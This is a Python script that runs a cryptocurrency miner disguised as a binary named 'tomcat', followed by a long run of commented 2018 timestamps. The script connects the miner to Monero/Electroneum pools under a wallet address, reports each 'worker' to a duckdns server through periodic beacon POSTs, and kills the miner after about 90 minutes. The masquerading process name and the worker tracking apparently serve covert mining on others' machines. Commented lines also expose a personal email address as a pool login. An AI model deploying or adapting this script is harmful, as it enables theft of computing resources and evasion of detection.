import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:06.926509
#2018-02-17 16:24:04.187941
#2018-02-17 18:12:01.251181
#2018-02-17 19:59:05.206706
#2018-02-17 21:47:01.781267
#2018-02-17 23:32:01.520894
#2018-02-18 01:21:03.944976
#2018-02-18 03:08:06.339250
#2018-02-18 04:55:05.962779
#2018-02-18 06:46:06.699525
#2018-02-18 08:36:02.051704
#2018-02-18 10:22:05.475609
#2018-02-18 12:08:06.423643
#2018-02-18 13:53:05.554349
#2018-02-18 15:44:06.276906
#2018-02-18 17:34:04.709431
#2018-02-18 19:22:07.579166
#2018-02-18 21:07:03.944860
#2018-02-18 22:54:03.832870
#2018-02-19 00:41:05.385553
#2018-02-19 02:26:07.721559
#2018-02-19 04:13:03.777103
#2018-02-19 05:56:07.010017
#2018-02-19 07:44:07.802774
#2018-02-19 09:34:03.314710
#2018-02-19 11:24:05.520914
#2018-02-19 13:11:05.984649
#2018-02-19 14:58:05.065851
#2018-02-19 16:46:08.395643
#2018-02-19 18:32:07.118966
#2018-02-19 20:18:01.651277
#2018-02-19 22:07:03.247452
#2018-02-19 23:52:06.200285
#2018-02-20 01:39:01.965509
#2018-02-20 03:27:05.320964
#2018-02-20 05:14:07.066920
#2018-02-20 06:56:06.167081
#2018-02-20 08:43:05.553993
#2018-02-20 10:27:04.754235
#2018-02-20 12:12:01.455539
#2018-02-20 14:01:04.495321
#2018-02-20 15:44:07.404538
#2018-02-20 17:29:08.690309
#2018-02-20 19:18:05.738977
#2018-02-20 21:06:06.892371
#2018-02-20 22:52:07.784779
#2018-02-21 00:37:05.261663
#2018-02-21 02:23:04.434353
#2018-02-21 04:09:01.278551
#2018-02-21 05:56:05.415535
#2018-02-21 07:44:01.472570
#2018-02-21 09:31:07.254065
#2018-02-21 11:19:09.235305
#2018-02-21 13:08:01.687057
#2018-02-21 14:54:05.069656
#2018-02-21 16:43:14.478000
#2018-02-21 18:33:06.272693
#2018-02-21 20:18:04.176016
#2018-02-21 22:05:07.044783
#2018-02-21 23:51:04.796527
#2018-02-22 01:41:05.528046
#2018-02-22 03:29:04.862469
#2018-02-22 05:16:03.558997
#2018-02-22 07:01:06.924121
#2018-02-22 08:48:04.955830
#2018-02-22 10:36:01.700217
#2018-02-22 12:24:09.935423
#2018-02-22 14:09:04.134280
#2018-02-22 15:57:13.628956
#2018-02-22 17:45:18.888480
#2018-02-22 19:32:09.975277
#2018-02-22 21:24:06.313830
#2018-02-22 23:11:04.708410
#2018-02-23 00:57:06.902606
#2018-02-23 02:46:04.544435
#2018-02-23 04:35:06.779735
#2018-02-23 06:21:04.794284
#2018-02-23 08:08:06.430601
#2018-02-23 10:23:06.320179
#2018-02-23 12:16:07.572402
#2018-02-23 14:06:09.187713
#2018-02-23 15:56:07.815064
#2018-02-23 17:43:06.753611
#2018-02-23 19:31:05.576807
#2018-02-23 21:14:07.964467
#2018-02-23 23:01:08.663882
#2018-02-24 00:47:07.305909
#2018-02-24 02:36:07.215110
#2018-02-24 04:32:05.689733
#2018-02-24 06:17:02.030562
#2018-02-24 08:05:07.224108
#2018-02-24 09:49:06.988359
#2018-02-24 11:44:05.375894
#2018-02-24 13:35:01.764725
#2018-02-24 15:22:05.018063
#2018-02-24 17:12:01.868677
#2018-02-24 19:05:04.258200
#2018-02-24 20:53:05.907993
#2018-02-24 23:14:02.110767
#2018-02-25 02:39:01.842062
#2018-02-25 06:16:06.751936
#2018-02-25 11:40:07.955042